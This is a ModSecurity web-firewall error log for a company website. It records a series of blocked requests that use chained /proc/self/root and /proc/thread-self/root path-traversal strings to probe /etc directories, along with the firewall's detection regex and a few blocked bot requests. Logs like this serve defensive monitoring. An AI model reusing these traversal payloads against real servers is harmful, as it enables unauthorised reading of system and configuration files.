[Fri Mar 20 08:30:45.172041 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:48542] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0v5da6ubjKNq_cu4baagAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:31:47.317453 2026] [:error] [pid 11642:tid 140411565680384] [client 74.7.243.128:57002] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0wIrninkcc-iUj5ApjnQAAA5U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:31:49.792408 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:49458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0wJda6ubjKNq_cu4banQAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:32:00.772668 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.243.128:35086] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0wMPqxLDW4GITHUkTungAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:32:05.643249 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:52880] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0wNda6ubjKNq_cu4barQAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:32:09.392742 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.243.128:52884] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0wOfXLqtnMIWvjpaKf9wAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:32:22.034764 2026] [:error] [pid 11642:tid 140411590858496] [client 74.7.243.128:55974] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0wRrninkcc-iUj5ApjrgAAA5I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:32:24.531857 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.243.128:39060] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0wSPqxLDW4GITHUkTuuQAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:33:06.034251 2026] [:error] [pid 7235:tid 140411741927168] [client 74.7.228.61:59370] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0wcvqxLDW4GITHUkTu5QAAAQA"]
[Fri Mar 20 08:33:31.152386 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.228.61:59274] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0wi-oXxyEfFpUF8f-GvAAAAVc"]
[Fri Mar 20 08:33:31.432028 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.243.128:39066] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0wizJ3M9BSuKP7CAYjxAAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:33:32.776828 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.243.128:43598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0wjPXLqtnMIWvjpaKgIgAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:33:39.864393 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:43602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0wk9a6ubjKNq_cu4ba7wAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:33:50.269234 2026] [:error] [pid 7235:tid 140411641214720] [client 74.7.243.128:45906] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0wnvqxLDW4GITHUkTvFQAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:33:58.275468 2026] [:error] [pid 7893:tid 140411641214720] [client 74.7.243.128:44364] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0wphCii7xarUs8iHZs5AAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:33:59.590589 2026] [:error] [pid 21219:tid 140411641214720] [client 74.7.243.128:34762] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0wp_XLqtnMIWvjpaKgNwAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:34:07.215460 2026] [:error] [pid 11167:tid 140411691570944] [client 74.7.243.128:34770] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0wr_HIg5MgXLBnicP9dAAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:34:09.820386 2026] [:error] [pid 11167:tid 140411599251200] [client 74.7.243.128:34784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0wsfHIg5MgXLBnicP9eAAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:34:12.244296 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.243.128:35318] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0wtPqxLDW4GITHUkTvIgAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:34:54.381638 2026] [:error] [pid 31215:tid 140411658000128] [client 74.7.244.43:50900] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0w3gF0L0L-SsrnPo5urwAAAso"]
[Fri Mar 20 08:35:20.090485 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.243.128:35334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0w9xCii7xarUs8iHZtLwAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:35:26.479135 2026] [:error] [pid 10189:tid 140411699963648] [client 74.7.243.128:39688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0w_jJ3M9BSuKP7CAYkLwAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:35:59.422960 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.243.128:39698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0xHzJ3M9BSuKP7CAYkWgAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
